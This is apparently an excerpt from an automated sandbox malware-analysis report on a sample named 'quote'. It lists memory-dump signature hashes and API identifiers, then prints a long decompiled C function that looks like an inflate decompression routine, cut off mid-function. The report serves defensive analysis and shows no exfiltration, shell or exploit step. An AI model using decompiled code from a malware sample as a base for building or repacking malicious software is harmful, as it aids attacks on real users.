                                                                                      • Opcode Fuzzy Hash: a47d7a9ecacf1dec181f3c6cccf8babffbfa46758323b33392feee04c62c6a78
                                                                                      • Instruction Fuzzy Hash: C6610D62E2F71598DB933472C1523F166D0CF1318AE69C71BCC2AB2461BB6F4A4FC585
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: eb8cecf910bbff3f7f1552f87976746ce7cb6e1ec7be012e78106778f3305595
                                                                                      • Instruction ID: b279b40771a69c3639c316094a29207a2b4c42e6d14df34f0a6e9e71984f2c63
                                                                                      • Opcode Fuzzy Hash: eb8cecf910bbff3f7f1552f87976746ce7cb6e1ec7be012e78106778f3305595
                                                                                      • Instruction Fuzzy Hash: B651FD62E2F71598EB537072C1513F166D0CF13189E69C71BDC2BB2461BB6F4A4AC481
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: a6ec80b9e0b57bd2fa2d1969fcd7c97795042c1369d40613e633179845438686
                                                                                      • Instruction ID: 8013379b087f85d1f3011c0f856973cfaf7f5dca4ab86c20df51bf59ad775bc6
                                                                                      • Opcode Fuzzy Hash: a6ec80b9e0b57bd2fa2d1969fcd7c97795042c1369d40613e633179845438686
                                                                                      • Instruction Fuzzy Hash: 6B51ED62E3FB1598DB537072C2513F166D0CF13189E69C71BDC2BB2461BB6F4A4AC481
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateMemoryVirtual
                                                                                      • String ID: _
                                                                                      • API String ID: 2167126740-701932520
                                                                                      • Opcode ID: d052cd1bb2e8032b43fff6f9bd4be3d3592748be81a8409657188a56a2e4ac53
                                                                                      • Instruction ID: b609e598a9c7c520f9977b9c1cd10a4899d7f581ef442ae68d77fed875128c1c
                                                                                      • Opcode Fuzzy Hash: d052cd1bb2e8032b43fff6f9bd4be3d3592748be81a8409657188a56a2e4ac53
                                                                                      • Instruction Fuzzy Hash: 45618871A08305DFDB20BF7488947EE33A6EF44364FA5862ECC8A87581E3305882DB56
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 'o0
                                                                                      • API String ID: 0-1304735848
                                                                                      • Opcode ID: 15b5daa5c2042b493aaec721d070d72dc57fd1f4f267937135e2b0d8371e5c56
                                                                                      • Instruction ID: 27da9b91d2fbeccfc2468cd6ae51f487985e5d9ff9168e8a9889d168cd2ae024
                                                                                      • Opcode Fuzzy Hash: 15b5daa5c2042b493aaec721d070d72dc57fd1f4f267937135e2b0d8371e5c56
                                                                                      • Instruction Fuzzy Hash: A98122325083498FDB24AF20CE047EE73BBAF91750F19851DDC99A7244D3385A46CB45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateMemoryVirtual
                                                                                      • String ID: 9
                                                                                      • API String ID: 2167126740-2366072709
                                                                                      • Opcode ID: 535e707600cd23ac97a50a56d05bf05fcac53b2f7a2c8be56e04ed59538c708d
                                                                                      • Instruction ID: bbf5c43436f24714780de431e4c35a93fd4a4658bb5030d4a6ee649524a66423
                                                                                      • Opcode Fuzzy Hash: 535e707600cd23ac97a50a56d05bf05fcac53b2f7a2c8be56e04ed59538c708d
                                                                                      • Instruction Fuzzy Hash: 1E51A47170024A8FDB74AE38CDA97EA37A7AF95344F948529DC89CB244E7358A45CB01
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 'o0
                                                                                      • API String ID: 0-1304735848
                                                                                      • Opcode ID: 9ffb4c8747657db072e89cce8a47d9dc2c7421b8f13b06ab5f62165c6df0fd8b
                                                                                      • Instruction ID: ac4d343d566f9c9247f1083354e209cb520a40473025f3aa531d128e6e130fbb
                                                                                      • Opcode Fuzzy Hash: 9ffb4c8747657db072e89cce8a47d9dc2c7421b8f13b06ab5f62165c6df0fd8b
                                                                                      • Instruction Fuzzy Hash: 9B4110765083988FEB749F248E153EB77E6AF95350F16852EDC89AB240D3308A408B45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 79%
                                                                                      			E00406C81(signed int __ebx, signed int* __esi) {
                                                                                      				signed int _t396;
                                                                                      				signed int _t425;
                                                                                      				signed int _t442;
                                                                                      				signed int _t443;
                                                                                      				signed int* _t446;
                                                                                      				void* _t448;
                                                                                      
                                                                                      				L0:
                                                                                      				while(1) {
                                                                                      					L0:
                                                                                      					_t446 = __esi;
                                                                                      					_t425 = __ebx;
                                                                                      					if( *(_t448 - 0x34) == 0) {
                                                                                      						break;
                                                                                      					}
                                                                                      					L55:
                                                                                      					__eax =  *(__ebp - 0x38);
                                                                                      					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                      					__ecx = __ebx;
                                                                                      					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                      					__ebx = __ebx + 8;
                                                                                      					while(1) {
                                                                                      						L56:
                                                                                      						if(__ebx < 0xe) {
                                                                                      							goto L0;
                                                                                      						}
                                                                                      						L57:
                                                                                      						__eax =  *(__ebp - 0x40);
                                                                                      						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                                      						__ecx = __eax;
                                                                                      						__esi[1] = __eax;
                                                                                      						__ecx = __eax & 0x0000001f;
                                                                                      						if(__cl > 0x1d) {
                                                                                      							L9:
                                                                                      							_t443 = _t442 | 0xffffffff;
                                                                                      							 *_t446 = 0x11;
                                                                                      							L10:
                                                                                      							_t446[0x147] =  *(_t448 - 0x40);
                                                                                      							_t446[0x146] = _t425;
                                                                                      							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                                      							L11:
                                                                                      							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                                      							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                                      							E004073F0( *(_t448 + 8));
                                                                                      							return _t443;
                                                                                      						}
                                                                                      						L58:
                                                                                      						__eax = __eax & 0x000003e0;
                                                                                      						if(__eax > 0x3a0) {
                                                                                      							goto L9;
                                                                                      						}
                                                                                      						L59:
                                                                                      						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                                      						__ebx = __ebx - 0xe;
                                                                                      						_t94 =  &(__esi[2]);
                                                                                      						 *_t94 = __esi[2] & 0x00000000;
                                                                                      						 *__esi = 0xc;
                                                                                      						while(1) {
                                                                                      							L60:
                                                                                      							__esi[1] = __esi[1] >> 0xa;
                                                                                      							__eax = (__esi[1] >> 0xa) + 4;
                                                                                      							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                      								goto L68;
                                                                                      							}
                                                                                      							L61:
                                                                                      							while(1) {
                                                                                      								L64:
                                                                                      								if(__ebx >= 3) {
                                                                                      									break;
                                                                                      								}
                                                                                      								L62:
                                                                                      								if( *(__ebp - 0x34) == 0) {
                                                                                      									goto L182;
                                                                                      								}
                                                                                      								L63:
                                                                                      								__eax =  *(__ebp - 0x38);
                                                                                      								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                      								__ecx = __ebx;
                                                                                      								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                      								__ebx = __ebx + 8;
                                                                                      							}
                                                                                      							L65:
                                                                                      							__ecx = __esi[2];
                                                                                      							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                                      							__ebx = __ebx - 3;
                                                                                      							_t108 = __ecx + 0x4084d4; // 0x121110
                                                                                      							__ecx =  *_t108;
                                                                                      							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                                      							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                                      							__ecx = __esi[1];
                                                                                      							__esi[2] = __esi[2] + 1;
                                                                                      							__eax = __esi[2];
                                                                                      							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                                      							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                                      								goto L64;
                                                                                      							}
                                                                                      							L66:
                                                                                      							while(1) {
                                                                                      								L68:
                                                                                      								if(__esi[2] >= 0x13) {
                                                                                      									break;
                                                                                      								}
                                                                                      								L67:
                                                                                      								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                                                                                      								__eax =  *_t119;
                                                                                      								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                                      								_t126 =  &(__esi[2]);
                                                                                      								 *_t126 = __esi[2] + 1;
                                                                                      							}
                                                                                      							L69:
                                                                                      							__ecx = __ebp - 8;
                                                                                      							__edi =  &(__esi[0x143]);
                                                                                      							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                                      							__eax = 0;
                                                                                      							 *(__ebp - 8) = 0;
                                                                                      							__eax =  &(__esi[3]);
                                                                                      							 *__edi = 7;
                                                                                      							__eax = E00407458( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                                      							if(__eax != 0) {
                                                                                      								L72:
                                                                                      								 *__esi = 0x11;
                                                                                      								while(1) {
                                                                                      									L180:
                                                                                      									_t396 =  *_t446;
                                                                                      									if(_t396 > 0xf) {
                                                                                      										break;
                                                                                      									}
                                                                                      									L1:
                                                                                      									switch( *((intOrPtr*)(_t396 * 4 +  &M004073B0))) {
                                                                                      										case 0:
                                                                                      											L101:
                                                                                      											__eax = __esi[4] & 0x000000ff;
                                                                                      											__esi[3] = __esi[4] & 0x000000ff;
                                                                                      											__eax = __esi[5];
                                                                                      											__esi[2] = __esi[5];
                                                                                      											 *__esi = 1;
                                                                                      											goto L102;
                                                                                      										case 1:
                                                                                      											L102:
                                                                                      											__eax = __esi[3];
                                                                                      											while(1) {
                                                                                      												L105:
                                                                                      												__eflags = __ebx - __eax;
                                                                                      												if(__ebx >= __eax) {
                                                                                      													break;
                                                                                      												}
                                                                                      												L103:
                                                                                      												__eflags =  *(__ebp - 0x34);
                                                                                      												if( *(__ebp - 0x34) == 0) {
                                                                                      													goto L182;
                                                                                      												}
                                                                                      												L104:
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                      												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                      												__ecx = __ebx;
                                                                                      												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                      												__ebx = __ebx + 8;
                                                                                      												__eflags = __ebx;
                                                                                      											}
                                                                                      											L106:
                                                                                      											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                                      											__eax = __eax &  *(__ebp - 0x40);
                                                                                      											__ecx = __esi[2];
                                                                                      											__eax = __esi[2] + __eax * 4;
                                                                                      											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                      											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                      											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                      											__ecx =  *__eax & 0x000000ff;
                                                                                      											__eflags = __ecx;
                                                                                      											if(__ecx != 0) {
                                                                                      												L108:
                                                                                      												__eflags = __cl & 0x00000010;
                                                                                      												if((__cl & 0x00000010) == 0) {
                                                                                      													L110:
                                                                                      													__eflags = __cl & 0x00000040;
                                                                                      													if((__cl & 0x00000040) == 0) {
                                                                                      														goto L125;
                                                                                      													}
                                                                                      													L111:
                                                                                      													__eflags = __cl & 0x00000020;
                                                                                      													if((__cl & 0x00000020) == 0) {
                                                                                      														goto L9;
                                                                                      													}
                                                                                      													L112:
                                                                                      													 *__esi = 7;
                                                                                      													goto L180;
                                                                                      												}
                                                                                      												L109:
                                                                                      												__esi[2] = __ecx;
                                                                                      												__esi[1] = __eax;
                                                                                      												 *__esi = 2;
                                                                                      												goto L180;
                                                                                      											}
                                                                                      											L107:
                                                                                      											__esi[2] = __eax;
                                                                                      											 *__esi = 6;
                                                                                      											goto L180;
                                                                                      										case 2:
                                                                                      											L113:
                                                                                      											__eax = __esi[2];
                                                                                      											while(1) {
                                                                                      												L116:
                                                                                      												__eflags = __ebx - __eax;
                                                                                      												if(__ebx >= __eax) {
                                                                                      													break;
                                                                                      												}
                                                                                      												L114:
                                                                                      												__eflags =  *(__ebp - 0x34);
                                                                                      												if( *(__ebp - 0x34) == 0) {
                                                                                      													goto L182;
                                                                                      												}
                                                                                      												L115:
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                      												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                      												__ecx = __ebx;
                                                                                      												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                      												__ebx = __ebx + 8;
                                                                                      												__eflags = __ebx;
                                                                                      											}
                                                                                      											L117:
                                                                                      											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                      											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                      											__ecx = __eax;
                                                                                      											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                      											__ebx = __ebx - __eax;
                                                                                      											__eflags = __ebx;
                                                                                      											__eax = __esi[4] & 0x000000ff;
                                                                                      											__esi[3] = __esi[4] & 0x000000ff;
                                                                                      											__eax = __esi[6];
                                                                                      											__esi[2] = __esi[6];
                                                                                      											 *__esi = 3;
                                                                                      											goto L118;
                                                                                      										case 3:
                                                                                      											L118:
                                                                                      											__eax = __esi[3];
                                                                                      											while(1) {
                                                                                      												L121:
                                                                                      												__eflags = __ebx - __eax;
                                                                                      												if(__ebx >= __eax) {
                                                                                      													break;
                                                                                      												}
                                                                                      												L119:
                                                                                      												__eflags =  *(__ebp - 0x34);
                                                                                      												if( *(__ebp - 0x34) == 0) {
                                                                                      													goto L182;
                                                                                      												}
                                                                                      												L120:
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                      												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                      												__ecx = __ebx;
                                                                                      												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                      												__ebx = __ebx + 8;
                                                                                      												__eflags = __ebx;
                                                                                      											}
                                                                                      											L122:
                                                                                      											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                                      											__eax = __eax &  *(__ebp - 0x40);
                                                                                      											__ecx = __esi[2];
                                                                                      											__eax = __esi[2] + __eax * 4;
                                                                                      											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                      											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                      											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                      											__ecx =  *__eax & 0x000000ff;
                                                                                      											__eflags = __cl & 0x00000010;
                                                                                      											if((__cl & 0x00000010) == 0) {
                                                                                      												L124:
                                                                                      												__eflags = __cl & 0x00000040;
                                                                                      												if((__cl & 0x00000040) != 0) {
                                                                                      													goto L9;
                                                                                      												}
                                                                                      												L125:
                                                                                      												__esi[3] = __ecx;
                                                                                      												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                                      												__esi[2] = __eax;
                                                                                      												goto L180;
                                                                                      											}
                                                                                      											L123:
                                                                                      											__esi[2] = __ecx;
                                                                                      											__esi[3] = __eax;
                                                                                      											 *__esi = 4;
                                                                                      											goto L180;
                                                                                      										case 4:
                                                                                      											L126:
                                                                                      											__eax = __esi[2];
                                                                                      											while(1) {
                                                                                      												L129:
                                                                                      												__eflags = __ebx - __eax;
                                                                                      												if(__ebx >= __eax) {
                                                                                      													break;
                                                                                      												}
                                                                                      												L127:
                                                                                      												__eflags =  *(__ebp - 0x34);
                                                                                      												if( *(__ebp - 0x34) == 0) {
                                                                                      													goto L182;
                                                                                      												}
                                                                                      												L128:
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                      												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                      												__ecx = __ebx;
                                                                                      												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                      												__ebx = __ebx + 8;
                                                                                      												__eflags = __ebx;
                                                                                      											}
                                                                                      											L130:
                                                                                      											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                      											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                      											__ecx = __eax;
                                                                                      											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                      											__ebx = __ebx - __eax;
                                                                                      											__eflags = __ebx;
                                                                                      											 *__esi = 5;
                                                                                      											goto L131;
                                                                                      										case 5:
                                                                                      											L131:
                                                                                      											__eax =  *(__ebp - 0x30);
                                                                                      											__edx = __esi[3];
                                                                                      											__eax = __eax - __esi;
                                                                                      											__ecx = __eax - __esi - 0x1ba0;
                                                                                      											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                                      											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                                      												__ecx = __eax;
                                                                                      												__ecx = __eax - __edx;
                                                                                      												__eflags = __ecx;
                                                                                      											} else {
                                                                                      												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                                      												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                                      												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                                      											}
                                                                                      											__eflags = __esi[1];
                                                                                      											 *(__ebp - 0x20) = __ecx;
                                                                                      											if(__esi[1] != 0) {
                                                                                      												L135:
                                                                                      												__edi =  *(__ebp - 0x2c);
                                                                                      												do {
                                                                                      													L136:
                                                                                      													__eflags = __edi;
                                                                                      													if(__edi != 0) {
                                                                                      														goto L152;
                                                                                      													}
                                                                                      													L137:
                                                                                      													__edi = __esi[0x26e8];
                                                                                      													__eflags = __eax - __edi;
                                                                                      													if(__eax != __edi) {
                                                                                      														L143:
                                                                                      														__esi[0x26ea] = __eax;
                                                                                      														__eax = E004073F0( *((intOrPtr*)(__ebp + 8)));
                                                                                      														__eax = __esi[0x26ea];
                                                                                      														__ecx = __esi[0x26e9];
                                                                                      														__eflags = __eax - __ecx;
                                                                                      														 *(__ebp - 0x30) = __eax;
                                                                                      														if(__eax >= __ecx) {
                                                                                      															__edi = __esi[0x26e8];
                                                                                      															__edi = __esi[0x26e8] - __eax;
                                                                                      															__eflags = __edi;
                                                                                      														} else {
                                                                                      															__ecx = __ecx - __eax;
                                                                                      															__edi = __ecx - __eax - 1;
                                                                                      														}
                                                                                      														__edx = __esi[0x26e8];
                                                                                      														__eflags = __eax - __edx;
                                                                                      														 *(__ebp - 8) = __edx;
                                                                                      														if(__eax == __edx) {
                                                                                      															__edx =  &(__esi[0x6e8]);
                                                                                      															__eflags = __ecx - __edx;
                                                                                      															if(__ecx != __edx) {
                                                                                      																__eax = __edx;
                                                                                      																__eflags = __eax - __ecx;
                                                                                      																 *(__ebp - 0x30) = __eax;
                                                                                      																if(__eax >= __ecx) {
                                                                                      																	__edi =  *(__ebp - 8);
                                                                                      																	__edi =  *(__ebp - 8) - __eax;
                                                                                      																	__eflags = __edi;
                                                                                      																} else {
                                                                                      																	__ecx = __ecx - __eax;
                                                                                      																	__edi = __ecx;
                                                                                      																}
                                                                                      															}
                                                                                      														}
                                                                                      														__eflags = __edi;
                                                                                      														if(__edi == 0) {
                                                                                      															goto L183;
                                                                                      														} else {
                                                                                      															goto L152;
                                                                                      														}
                                                                                      													}
                                                                                      													L138:
                                                                                      													__ecx = __esi[0x26e9];
                                                                                      													__edx =  &(__esi[0x6e8]);
                                                                                      													__eflags = __ecx - __edx;
                                                                                      													if(__ecx == __edx) {
                                                                                      														goto L143;
                                                                                      													}
                                                                                      													L139:
                                                                                      													__eax = __edx;
                                                                                      													__eflags = __eax - __ecx;
                                                                                      													if(__eax >= __ecx) {
                                                                                      														__edi = __edi - __eax;
                                                                                      														__eflags = __edi;
                                                                                      													} else {
                                                                                      														__ecx = __ecx - __eax;
                                                                                      														__edi = __ecx;
                                                                                      													}
                                                                                      													__eflags = __edi;
                                                                                      													if(__edi == 0) {
                                                                                      														goto L143;
                                                                                      													}
                                                                                      													L152:
                                                                                      													__ecx =  *(__ebp - 0x20);
                                                                                      													 *__eax =  *__ecx;
                                                                                      													__eax = __eax + 1;
                                                                                      													__ecx = __ecx + 1;
                                                                                      													__edi = __edi - 1;
                                                                                      													__eflags = __ecx - __esi[0x26e8];
                                                                                      													 *(__ebp - 0x30) = __eax;
                                                                                      													 *(__ebp - 0x20) = __ecx;
                                                                                      													 *(__ebp - 0x2c) = __edi;
                                                                                      													if(__ecx == __esi[0x26e8]) {
                                                                                      														__ecx =  &(__esi[0x6e8]);
                                                                                      														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                                                      													}
                                                                                      													_t357 =  &(__esi[1]);
                                                                                      													 *_t357 = __esi[1] - 1;
                                                                                      													__eflags =  *_t357;
                                                                                      												} while ( *_t357 != 0);
                                                                                      											}
                                                                                      											goto L23;
                                                                                      										case 6:
                                                                                      											L156:
                                                                                      											__eax =  *(__ebp - 0x2c);
                                                                                      											__edi =  *(__ebp - 0x30);
                                                                                      											__eflags = __eax;
                                                                                      											if(__eax != 0) {
                                                                                      												L172:
                                                                                      												__cl = __esi[2];
                                                                                      												 *__edi = __cl;
                                                                                      												__edi = __edi + 1;
                                                                                      												__eax = __eax - 1;
                                                                                      												 *(__ebp - 0x30) = __edi;
                                                                                      												 *(__ebp - 0x2c) = __eax;
                                                                                      												goto L23;
                                                                                      											}
                                                                                      											L157:
                                                                                      											__ecx = __esi[0x26e8];
                                                                                      											__eflags = __edi - __ecx;
                                                                                      											if(__edi != __ecx) {
                                                                                      												L163:
                                                                                      												__esi[0x26ea] = __edi;
                                                                                      												__eax = E004073F0( *((intOrPtr*)(__ebp + 8)));
                                                                                      												__edi = __esi[0x26ea];
                                                                                      												__ecx = __esi[0x26e9];
                                                                                      												__eflags = __edi - __ecx;
                                                                                      												 *(__ebp - 0x30) = __edi;
                                                                                      												if(__edi >= __ecx) {
                                                                                      													__eax = __esi[0x26e8];
                                                                                      													__eax = __esi[0x26e8] - __edi;
                                                                                      													__eflags = __eax;
                                                                                      												} else {
                                                                                      													__ecx = __ecx - __edi;
                                                                                      													__eax = __ecx - __edi - 1;
                                                                                      												}
                                                                                      												__edx = __esi[0x26e8];
                                                                                      												__eflags = __edi - __edx;
                                                                                      												 *(__ebp - 8) = __edx;
                                                                                      												if(__edi == __edx) {
                                                                                      													__edx =  &(__esi[0x6e8]);
                                                                                      													__eflags = __ecx - __edx;
                                                                                      													if(__ecx != __edx) {
                                                                                      														__edi = __edx;
                                                                                      														__eflags = __edi - __ecx;
                                                                                      														 *(__ebp - 0x30) = __edi;
                                                                                      														if(__edi >= __ecx) {
                                                                                      															__eax =  *(__ebp - 8);
                                                                                      															__eax =  *(__ebp - 8) - __edi;
                                                                                      															__eflags = __eax;
                                                                                      														} else {
                                                                                      															__ecx = __ecx - __edi;
                                                                                      															__eax = __ecx;
                                                                                      														}
                                                                                      													}
                                                                                      												}
                                                                                      												__eflags = __eax;
                                                                                      												if(__eax == 0) {
                                                                                      													goto L183;
                                                                                      												} else {
                                                                                      													goto L172;
                                                                                      												}
                                                                                      											}
                                                                                      											L158:
                                                                                      											__eax = __esi[0x26e9];
                                                                                      											__edx =  &(__esi[0x6e8]);
                                                                                      											__eflags = __eax - __edx;
                                                                                      											if(__eax == __edx) {
                                                                                      												goto L163;
                                                                                      											}
                                                                                      											L159:
                                                                                      											__edi = __edx;
                                                                                      											__eflags = __edi - __eax;
                                                                                      											if(__edi >= __eax) {
                                                                                      												__ecx = __ecx - __edi;
                                                                                      												__eflags = __ecx;
                                                                                      												__eax = __ecx;
                                                                                      											} else {
                                                                                      												__eax = __eax - __edi;
                                                                                      												__eax = __eax - 1;
                                                                                      											}
                                                                                      											__eflags = __eax;
                                                                                      											if(__eax != 0) {
                                                                                      												goto L172;
                                                                                      											} else {
                                                                                      												goto L163;
                                                                                      											}
                                                                                      										case 7:
                                                                                      											L173:
                                                                                      											__eflags = __ebx - 7;
                                                                                      											if(__ebx > 7) {
                                                                                      												__ebx = __ebx - 8;
                                                                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                                                      												_t380 = __ebp - 0x38;
                                                                                      												 *_t380 =  *(__ebp - 0x38) - 1;
                                                                                      												__eflags =  *_t380;
                                                                                      											}
                                                                                      											goto L175;
                                                                                      										case 8:
                                                                                      											L4:
                                                                                      											while(_t425 < 3) {
                                                                                      												if( *(_t448 - 0x34) == 0) {
                                                                                      													goto L182;
                                                                                      												} else {
                                                                                      													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                                                      													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                                                      													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                                                      													_t425 = _t425 + 8;
                                                                                      													continue;
                                                                                      												}
                                                                                      											}
                                                                                      											_t425 = _t425 - 3;
                                                                                      											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                                                      											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                                                      											asm("sbb ecx, ecx");
                                                                                      											_t408 = _t406 >> 1;
                                                                                      											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                                                      											if(_t408 == 0) {
                                                                                      												L24:
                                                                                      												 *_t446 = 9;
                                                                                      												_t436 = _t425 & 0x00000007;
                                                                                      												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                                                      												_t425 = _t425 - _t436;
